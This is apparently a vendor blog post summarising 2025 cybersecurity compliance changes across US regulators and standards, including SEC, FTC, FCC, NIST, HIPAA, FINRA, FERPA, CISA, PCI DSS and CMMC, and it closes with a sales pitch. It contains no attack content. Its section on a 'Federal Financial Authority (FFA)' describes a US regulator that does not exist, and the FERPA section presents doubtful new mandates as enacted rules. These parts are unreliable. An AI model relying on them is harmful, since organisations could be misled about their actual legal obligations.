Simplified Cybersecurity Compliance Standards Updates for Security Leaders Who Feel Unprepared

Regulatory bodies somewhat intentionally turn like a large ship. However, despite them remaining relatively steadfast in their objectives of protecting people, we know the cyber industry changes quickly. For these reasons, cybersecurity compliance standards​, rules, and regulations may be updated more frequently than most.

And honestly, it’s not always easy to find exactly what cybersecurity compliance standards​ organizations need to adhere to—let alone what’s new each year.

SEC, FTC, FCC, NIST, HHS/OCR, FFA, FINRA, FERPA, CISA, PCI, and CMMC all have updates to their regulations that will affect organizations’ cyber efforts in 2025. Some changes were made official in 2024, and others are new in 2025.

To distill this information, we’ve compiled some cybersecurity compliance standards​ for the organizations we serve (or aim to)—and then gathered what’s new to pay attention to for 2025 to help you and your organization feel more prepared.

The Securities and Exchange Commission (SEC)

The Securities and Exchange Commission (SEC) is a U.S. government agency responsible for enforcing federal securities (investments) laws, regulating the securities industry, and ensuring fair and efficient markets. Its mission is to protect investors, maintain fair, orderly, and efficient markets, and facilitate capital formation.

Who Needs to Comply with the SEC Regulations?

SEC regulations apply to:

• Public companies: Corporations that issue publicly traded securities.
• Broker-dealers: Firms that buy and sell securities on behalf of clients.
• Investment advisors: Professionals offering investment advice and management.
• Mutual funds and ETFs: Investment companies offering pooled investment products.
• Securities exchanges: Platforms where securities are traded.

What Cybersecurity Changes Have Been Made to the SEC Regulations for 2025?

In 2025, the SEC has introduced several key updates:

1. Crypto Task Force:
   • The SEC is forming a new task force to develop a comprehensive regulatory framework for crypto assets. This aims to clarify the application of existing securities laws to digital assets and establish practical disclosure frameworks.
2. Notice of Exempt Solicitations:
   • There is updated guidance on Form PX14A6G filings, which requires shareholders owning over $5 million of a company’s securities to file solicitation materials with the SEC. The updates clarify permissible voluntary submissions and the requirements for cover pages and soliciting materials.
3. Regulatory Freeze Pending Review:
   • An executive order issued by President Trump on January 20, 2025, directed federal agencies (including the SEC) to pause all rulemaking activity for 60 days. This impacts ongoing and recently finalized regulations—including climate-related disclosure rules.
4. Investment Company Names Rule:
   • This is an extension of compliance dates for amendments to the Investment Company Act “Names Rule,” which addresses fund names likely to mislead investors about a fund’s investments and risks.

Additionally, Final Rule for SEC Regulations S-P was released in May of 2024. According to the SEC themselves, “larger entities will have 18 months after the date of publication in the Federal Register to comply with the amendments, and smaller entities will have 24 months after the date of publication in the Federal Register to comply.”

The requirements for this include:

• A formal incident response program
  • Detect, respond to, and recover from unauthorized access relating to customer data.
  • Procedures to assess the nature and scope of incident.
  • Establishment, maintenance, and enforcement of written policies and procedures.
• Customer notification requirements
  • Requires a covered institution to provide the notice as soon as practicable, but not later than 30 days.
  • Must include details about the incident, the breached data, and how affected individuals can respond to the breach to protect themselves.
• Other S-P amendments
  • Expanded information covered by the safeguards and disposal rules.
  • Make and maintain written records documenting compliance with the safeguards and disposal rules.

These changes reflect the SEC’s evolving priorities and regulatory approach under new leadership and administration.

More Information on SEC Regulations

The SEC’s new cybersecurity disclosure rules decoded: what they mean for investors

Federal Trade Commission (FTC)

The Federal Trade Commission (FTC) is a U.S. government agency tasked with protecting consumers and ensuring a competitive marketplace. It enforces laws against deceptive advertising, unfair business practices, and violations of consumer privacy.

Who Needs to Comply with FTC Regulations?

FTC regulations apply to a wide range of entities, including:

• Businesses and advertisers (e.g. companies promoting products or services)
• Online service providers (e.g. websites and apps collecting user data)
• Retailers (e.g. companies selling goods and services)
• Telemarketers (e.g. businesses making sales calls)
• Data brokers (e.g. companies collecting and selling consumer information)

What Cybersecurity Changes Have Been Made to FTC Regulations for 2025?

In 2025, the FTC has introduced significant updates to several key regulations:

1. Children’s Online Privacy Protection Act (COPPA):
   • Opt-in Consent for Targeted Advertising: Websites and online services must obtain verifiable parental consent before disclosing children’s personal information to third parties for targeted advertising.
   • Data Retention Limits: Operators can only retain personal information for as long as reasonably necessary to fulfill the purpose for which it was collected.
   • Increased Transparency: FTC-approved COPPA Safe Harbor programs must publicly disclose their membership lists and report additional information to the FTC.
2. Negative Option Rule:
   • Enhanced Disclosure Requirements: Businesses must provide clear and unavoidable disclosures about recurring payments_—including the amount, frequency, and cancellation mechanisms.
   • Express Informed Consent: Consumers must provide separate consent for negative option features, ensuring they understand they are agreeing to a subscription or recurring payment.
   • Prohibition of Misrepresentation: Businesses cannot misrepresent any material fact regarding the negative option offer or any other aspect of the offering.

These changes aim to strengthen consumer protections, particularly around children’s privacy and subscription-based services.

More Information on FTC Regulations

• FTC Finalizes Changes to Children’s Privacy Rule Limiting Companies’ Ability to Monetize Kids’ Data
• New FTC Final Rule Changes COPPA Obligations for Online Services Collecting Data from Children

Federal Communications Commission (FCC)

The Federal Communications Commission (FCC) is a U.S. government agency responsible for regulating interstate and international communications by radio, television, wire, satellite, and cable. Its mission is to ensure that the communications infrastructure is reliable, accessible, and serves the public interest.

Who Needs to Comply with FCC Regulations?

FCC regulations apply to a wide range of entities, including:

• Telecommunications companies (e.g. phone and internet service providers)
• Broadcasting organizations (e.g. TV and radio stations)
• Manufacturers of communication equipment (e.g. mobile phones, routers)
• Businesses using telemarketing (e.g. companies making robocalls or sending robotexts)
• Satellite and cable operators

What Cybersecurity Changes Have Been Made to FCC Regulations for 2025?

In 2025, the FCC introduced significant updates to the Telephone Consumer Protection Act (TCPA), focusing on consent and revocation rules for robocalls and robotexts:

1. New Consent Rule (Effective January 27, 2025):
   • Marketers must obtain individual written consent from consumers for each company sending robocalls or robotexts.
   • Consent must be clear and conspicuous, and communications must be logically related to the website where consent was obtained.
2. Consent Revocation Rule (Effective April 11, 2025):
   • Consumers can revoke consent through any reasonable method, such as replying “stop” or “quit” to texts.
   • Marketers must honor revocation requests within 10 business days.
   • Businesses cannot designate an exclusive means for revocation.

These changes aim to give consumers greater control over their communications preferences and ensure businesses adhere to stricter consent and revocation practices.

More Information about the FCC Regulations

CPNI, Privacy, Cyber Security, and TCPA Update

National Institute of Standards and Technology (NIST)

The National Institute of Standards and Technology (NIST) is a U.S. government agency under the Department of Commerce. Founded in 1901, its mission is to promote innovation, industrial competitiveness, and technological advancements. NIST is a leader in cybersecurity through its Cybersecurity Framework (CSF), providing universal guidelines that organizations can adapt for risk management and IT security.

Who Needs to Comply with NIST Regulations?

NIST guidelines are widely adopted by:

• Federal agencies: Mandated to follow NIST standards to ensure national security and compliance with laws like the Federal Information Security Management Act (FISMA).
• Private sector organizations: Including healthcare, financial services, and tech industries—which use NIST standards to enhance cybersecurity and meet compliance requirements.
• Defense contractors: Required to comply with NIST guidelines under frameworks like the Defense Federal Acquisition Regulation Supplement (DFARS).

What Cybersecurity Changes Have Been Made to NIST Regulations for 2025?

In 2025, NIST has introduced several key updates:

1. Cybersecurity Framework (CSF) 2.0:
   • Enhanced Risk Management: The updated framework emphasizes integrating cybersecurity with enterprise risk management.
   • Workforce Management: New guidelines for managing cybersecurity workforce and training.
2. Guidelines for API Protection:
   • NIST SP 800-228: Provides guidelines for protecting APIs in cloud-native systems.
3. Adversarial Machine Learning:
   • NIST AI 100-2: A taxonomy and terminology for attacks and mitigations in adversarial machine learning.
4. 5G Cybersecurity:
   • NIST SP 1800-33: Draft guidelines for securing 5G networks.

These updates reflect the growing complexity of cyber threats, advancements in technology, and the need for organizations to adapt.

NIST CSF 2.0 has now been out for long enough that organizations will soon be expected to update their programs to align with the updates.

More Information About the NIST CSF 2.0 Regulations

• NIST CSF 2.0 has a new Govern Function
• Top 4 NIST CSF 2.0 Changes

Department of Health & Human Services (HHS)/Office for Civil Rights (OCR)

The Office for Civil Rights (OCR) is part of the U.S. Department of Health and Human Services (HHS). It enforces laws that protect individuals’ health information privacy and security, primarily through the Health Insurance Portability and Accountability Act (HIPAA).

The Department of Health and Human Services (HHS) has established Cybersecurity Performance Goals to protect the healthcare sector from cyber threats and ensure the security of sensitive health information. These goals are part of a broader effort to enhance the resilience and reliability of healthcare infrastructure.

Who Needs to Comply with HHS Cybersecurity Goals?

Compliance with HHS cybersecurity goals is required for:

• Covered entities: Health plans, healthcare clearinghouses, and most healthcare providers.
• Business associates: Entities that perform services for covered entities involving the use or disclosure of protected health information (PHI).
• Federal agencies: Government entities managing healthcare-related information systems.

Cybersecurity Performance Goals are currently voluntary but widely expected to become requirements in the future. We covered those extensively in a prior blog post (https://frsecure.com/blog/hhs-cybersecurity-performance-goals-checklists/)

The HHS also issued a notice in late December 2024 that they will be updating the HIPAA Security Rule (https://www.hhs.gov/hipaa/for-professionals/security/hipaa-security-rule-nprm/factsheet/index.html)

What Cybersecurity Changes Have Been Made to OCR & HHS Regulations for 2025?

In 2025, HHS has proposed significant updates to the HIPAA Security Rule to strengthen cybersecurity protections for electronic protected health information (ePHI):

1. Removal of Distinction:
   • The distinction between “required” and “addressable” implementation specifications will be removed, making all specifications required with specific, limited exceptions.
2. Documentation Requirements:
   • Written documentation of all Security Rule policies, procedures, plans, and analyses will be required.
3. Technology Asset Inventory:
   • Regulated entities must develop and maintain a technology asset inventory and a network map illustrating the movement of ePHI within their electronic information systems.
4. Risk Analysis Specificity:
   • Greater specificity will be required for conducting risk analyses.

These changes aim to address the increasing cybersecurity threats to the healthcare sector and ensure more robust protection of sensitive health information.

More Information About the HHS Cybersecurity Performance Goals:

HPH Cybersecurity Performance Goals

Federal Financial Authority (FFA)

The Federal Financial Authority (FFA) regulates financial institutions and markets to ensure stability, transparency, and consumer protection. It enforces laws related to banking, securities, insurance, and other financial services.

Who Needs to Comply with FFA Regulations?

FFA regulations apply to:

• Banks and credit unions: Institutions offering deposit accounts and loans.
• Securities firms: Companies involved in trading stocks, bonds, and other securities.
• Insurance companies: Providers of various insurance products.
• Investment advisors: Professionals offering investment advice and management.
• Payment processors: Entities handling electronic transactions.

What Cybersecurity Changes Have Been Made to the FFA Regulations for 2025?

In 2025, the FFA has introduced several key updates:

1. Enhanced Consumer Protection Measures:
   • Stricter disclosure requirements for financial products, ensuring consumers receive clear and comprehensive information.
   • Improved fraud detection protocols to protect consumers from identity theft and financial scams.
2. Cybersecurity Standards:
   • Mandatory cybersecurity assessments for all regulated entities to identify and mitigate risks.
   • Implementation of advanced encryption technologies to safeguard sensitive financial data.

These changes aim to enhance consumer protection and mitigate risks.

More Information About FFA Regulations

Cybersecurity in 2025: What Financial Institutions Need to Know

Financial Industry Regulatory Authority (FINRA)

The Financial Industry Regulatory Authority (FINRA) is a non-governmental organization that regulates member brokerage firms and exchange markets. Its mission is to protect investors and ensure market integrity through effective and efficient regulation.

Who Needs to Comply with FINRA Regulations?

FINRA regulations apply to:

• Broker-dealers: Firms that buy and sell securities on behalf of clients.
• Registered representatives: Individuals who work for broker-dealers and are licensed to trade securities.
• Market makers: Firms that provide liquidity to the market by buying and selling securities.
• Investment advisors: Professionals offering investment advice and management.

What Cybersecurity Changes Have Been Made to FINRA Regulations for 2025?

In 2025, FINRA has introduced several key updates:

1. Third-Party Risk Landscape:
   • Enhanced oversight of third-party service providers to mitigate risks associated with outsourcing critical functions.
2. Cybersecurity and Cyber-Enabled Fraud:
   • Updated guidelines to address evolving cybersecurity threats and enhance protections against cyber-enabled fraud.
3. Artificial Intelligence (AI):
   • New regulations governing the use of Artificial Intelligence (AI) in trading and investment decision-making to ensure ethical and transparent practices.
4. Investment Fraud:
   • Increased focus on identifying and preventing investment fraud targeting retail investors.
5. Remote Inspections Pilot Program:
   • Expanded rules for remote inspections and residential supervisory locations to adapt to modern workplace trends.

These changes aim to strengthen the regulatory framework, enhance investor protections, and adapt to technological advancements in the financial industry.

More Information on FINRA Regulations

2025 FINRA Annual Regulatory Oversight Report

Family Educational Rights and Privacy Act (FERPA)

The Family Educational Rights and Privacy Act (FERPA) is a U.S. federal law that protects the privacy of student education records. It grants parents certain rights regarding their children’s education records, which transfer to the student when they turn 18 or attend a school beyond the high school level.

Who Needs to Comply with FERPA Regulations?

FERPA regulations apply to:

• Educational institutions: Schools, colleges, and universities that receive federal funding.
• School officials: Teachers, administrators, and other staff with access to student records.
• Third-party service providers: Companies that handle student data on behalf of educational institutions.

What Cybersecurity Changes Have Been Made to FERPA Regulations for 2025?

In 2025, FERPA has introduced several key updates:

1. Enhanced Parental Rights:
   • Schools must allow parents to review all education records of their student, including documents related to a student’s gender identity.
   • Schools must provide annual notifications to parents and eligible students about their rights under FERPA.
2. Data Security Requirements:
   • Educational institutions must implement stricter cybersecurity measures to protect student data from breaches.
   • Schools must maintain detailed records of data access and usage to ensure compliance.
3. Transparency and Accountability:
   • Schools must publicly disclose their data privacy practices and any third-party agreements involving student data.
   • Institutions must report any data breaches to the Department of Education and affected individuals promptly.

These changes aim to strengthen the protection of student privacy and ensure greater transparency and accountability in handling student data.

More Information on FERPA Regulations

FERPA Compliance Guide (Updated 2025)

Cybersecurity and Infrastructure Security Agency (CISA)

The Cybersecurity and Infrastructure Security Agency (CISA) is a U.S. government agency responsible for enhancing the security, resilience, and reliability of the nation’s cybersecurity and infrastructure. CISA works to protect against cyber threats and ensure the security of critical infrastructure sectors.

Who Needs to Comply with CISA Regulations?

CISA regulations apply to:

• Federal agencies: Government entities that manage critical infrastructure and information systems.
• Critical infrastructure sectors: Industries such as energy, healthcare, financial services, transportation, and communications.
• Private sector organizations: Companies that operate within critical infrastructure sectors and handle sensitive data.

What Cybersecurity Changes Have Been Made to CISA Regulations for 2025?

In 2025, CISA has introduced several key updates:

1. Cybersecurity Incident Reporting for Critical Infrastructure Act (CIRCIA):
   • Reporting Requirements: Operators of critical infrastructure must report substantial cybersecurity incidents within 72 hours and ransom payments within 24 hours.
   • Scope of Coverage: The regulations apply broadly to any entity in a critical infrastructure sector that meets sector-specific criteria or exceeds a small business threshold.
2. Binding Operational Directive (BOD) 25-01:
   • Secure Cloud Practices: Federal agencies must implement Secure Configuration Baselines for certain Software as a Service (SaaS) products—such as Microsoft Office 365.
   • Continuous Monitoring: Agencies must deploy automated configuration assessment tools and integrate with CISA’s continuous monitoring infrastructure.

These changes aim to enhance the security of critical infrastructure and federal information systems, ensuring robust protection against evolving cyber threats.

More Information on CISA Requirements:

• Navigating Profound Change: CISA Announces Proposed Rule for Mandated Cyber Incident Reporting
• BOD 25-01: Implementation Guidance for Implementing Secure Practices for Cloud Services

Payment Card Industry (PCI)

Payment Card Industry (PCI) compliance refers to a set of security standards designed to ensure that all companies that process, store, or transmit credit card information maintain a secure environment. These standards are developed and managed by the PCI Security Standards Council (PCI SSC), which was founded by major credit card companies like Visa, MasterCard, American Express, Discover, and JCB.

Who Needs to Comply with PCI?

Compliance with PCI standards is required for:

• Merchants: Any business that accepts credit card payments, whether online, in-store, or over the phone.
• Payment processors: Companies that handle transactions between merchants and banks.
• Service providers: Entities that store, process, or transmit cardholder data on behalf of merchants.
• Financial institutions: Banks and other entities involved in issuing credit cards.

What Changes Have Been Made to PCI Regulations for 2025?

The latest version, PCI DSS v4.0, includes several updates that will become mandatory by March 31, 2025. Key changes include:

• Enhanced Cybersecurity Measures: New protocols for protecting cardholder data against cyber threats.
• Targeted Risk Analysis (TRA): Entities must conduct risk analyses to identify and mitigate potential vulnerabilities.
• Multi-Factor Authentication (MFA): Mandatory use of MFA for accessing cardholder data environments.
• Automated Controls: Implementation of automated mechanisms for reviewing audit logs and scanning removable media.
• Change Detection Tools: Deployment of tools to monitor changes in payment pages and detect unauthorized modifications.

These updates aim to strengthen the security of payment card transactions and protect against increasingly sophisticated cyber threats.

More Information on PCI Standards

• How to Comply with PCI DSS 4.0.1 (2025 Guide)
• PCI compliance in 2025: what are the best practices?

Cybersecurity Maturity Model Certification (CMMC)

The Cybersecurity Maturity Model Certification (CMMC) is a framework developed by the U.S. Department of Defense (DoD) to enhance the cybersecurity posture of organizations within the Defense Industrial Base (DIB). It aims to ensure that contractors handling sensitive federal information, such as Controlled Unclassified Information (CUI), meet specific cybersecurity standards.

Who Needs to Comply with CMMC Regulations?

CMMC regulations apply to:

• Defense contractors: Companies that provide goods and services to the DoD.
• Subcontractors: Entities working with prime contractors on DoD contracts.
• Suppliers: Organizations within the supply chain that handle CUI.

What Changes Have Been Made to CMMC Requirements for 2025?

In 2025, the CMMC program has undergone significant updates, culminating in the release of the CMMC 2.0 final rule:

1. Streamlined Maturity Levels:
   • Level 1 (Foundational): Basic safeguarding requirements for Federal Contract Information (FCI), with 17 cybersecurity practices.
   • Level 2 (Advanced): Alignment with NIST SP 800-171, requiring 110 security practices to protect CUI.
   • Level 3 (Expert): Incorporates additional requirements from NIST SP 800-172, targeting critical national security programs.
2. Assessment Types:
   • Self-Assessments: Allowed for Level 1 compliance.
   • Third-Party Assessments: Required for Level 2 compliance involving sensitive CUI.
   • Government-Led Assessments: Required for Level 3 compliance for the most critical programs.
3. Plans of Action and Milestones (POA&Ms):
   • Contractors can submit POA&Ms for certain non-compliant items, providing flexibility in achieving certification. However, high-priority requirements must still be met for contract eligibility.

These changes aim to simplify compliance while maintaining robust security requirements, ensuring that defense contractors can effectively protect sensitive information.

More Information on CMMC Requirements

• Overview of the CMMC Program
• Stop Procrastinating: Your Guide to the CMMC Final Rule

2025 Cybersecurity Compliance Standards Takeaways and Advice

So, what does this mean for organizations?

Well, the reality is that if you already have a solid security program then it should be more updating documentation to align with some of the changes in the language for most of these cybersecurity compliance standards​. If you are not already in compliance with the requirements, it goes back to the basics.

We like to say that if you do security correctly, you will get to compliance—but being compliant doesn’t mean you are secure.

That still holds true for all these changes. Build your program properly and you will be in a good position to meet any required cybersecurity compliance standards​.

What seems to be the overarching theme is more accountability regarding managing third-party risk management. It will no longer be defensible NOT to have a plan to assess the risks your suppliers present to you.

Work with an expert who can help you navigate what the cybersecurity compliance standards​ are looking for. Don’t try to reinvent the wheel. We have a plethora of resources on our site that can help you from policy templates to an IR plan and playbooks, and if you need further assistance with any of these regulations, don’t hesitate to reach out.